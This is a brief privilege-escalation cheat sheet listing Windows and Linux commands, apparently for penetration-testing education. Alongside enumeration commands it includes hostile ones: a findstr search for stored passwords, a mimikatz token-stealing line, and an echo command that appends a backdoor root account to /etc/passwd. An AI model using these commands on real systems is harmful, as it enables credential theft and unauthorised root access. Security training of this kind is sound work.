Privilege Escalation is the process where a user gains higher-level permissions, usually to perform actions reserved for admins or SYSTEM.
See what privileges your user has:
whoami /priv
List automatically starting services, often vulnerable:
wmic service get name,displayname,pathname,startmode | findstr /i "Auto"
Check if a service path isn't quoted (can exploit by placing your executable):
sc qc ServiceName
Find scheduled tasks where you might have write access:
schtasks /query /fo LIST /v
Look for files/folders with weak ACLs (you can edit):
icacls C:\Path\To\FileOrFolder
PowerShell module to find misconfigurations automatically:
Import-Module .\PowerUp.ps1 Invoke-AllChecks
Search for passwords inside common file types:
findstr /si password *.txt *.ini *.xml
Steal another user's token and impersonate:
mimikatz privilege::debug token::elevate
See what commands you can run with sudo without password:
sudo -l
SUID files run as the file owner (often root):
find / -perm -4000 2>/dev/null
If you can write to /etc/passwd, add a root user manually:
echo 'attacker:$1$xyz$...:0:0:root:/root:/bin/bash' >> /etc/passwd
Privilege escalation is key both for attackers and defenders. Understanding and fixing vulnerabilities helps to protect systems properly.